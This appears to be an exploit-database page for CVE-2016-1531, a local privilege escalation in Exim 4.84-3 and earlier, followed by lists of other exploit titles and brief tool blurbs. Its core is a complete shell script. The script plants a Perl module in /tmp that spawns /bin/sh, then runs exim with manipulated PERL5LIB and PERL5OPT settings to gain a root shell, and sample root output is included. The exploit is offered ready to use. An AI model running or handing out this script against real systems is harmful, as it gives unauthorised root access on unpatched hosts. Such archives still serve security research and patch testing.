Menu

Search for hundreds of thousands of exploits

"Exim 4.84-3 - Local Privilege Escalation"

Author

Exploit author

"Hacker Fantastic"

Platform

Exploit platform

linux

Release date

Exploit published date

2016-03-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2018-12-11 "GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)" dos linux "Hacker Fantastic"
2018-10-25 "xorg-x11-server < 1.20.3 - Local Privilege Escalation" local multiple "Hacker Fantastic"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-04-12 "Solaris 7 < 11 (SPARC/x86) - 'EXTREMEPARR' dtappgather Privilege Escalation" local solaris "Hacker Fantastic"
2017-04-02 "PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation" local linux "Hacker Fantastic"
2017-02-15 "Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses" webapps php "Hacker Fantastic"
2016-12-18 "RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection" local linux "Hacker Fantastic"
2016-12-18 "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution" local linux "Hacker Fantastic"
2016-10-21 "TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection" remote hardware "Hacker Fantastic"
2016-03-09 "Exim 4.84-3 - Local Privilege Escalation" local linux "Hacker Fantastic"
2016-01-15 "Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation" local linux "Hacker Fantastic"
2016-01-11 "Amanda 3.3.1 - Local Privilege Escalation" local linux "Hacker Fantastic"
2015-06-02 "PonyOS 3.0 - TTY 'ioctl()' Local Kernel" local linux "Hacker Fantastic"
2015-06-01 "PonyOS 3.0 - ELF Loader Privilege Escalation" local linux "Hacker Fantastic"
2015-06-01 "PonyOS 3.0 - VFS Permissions" local linux "Hacker Fantastic"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.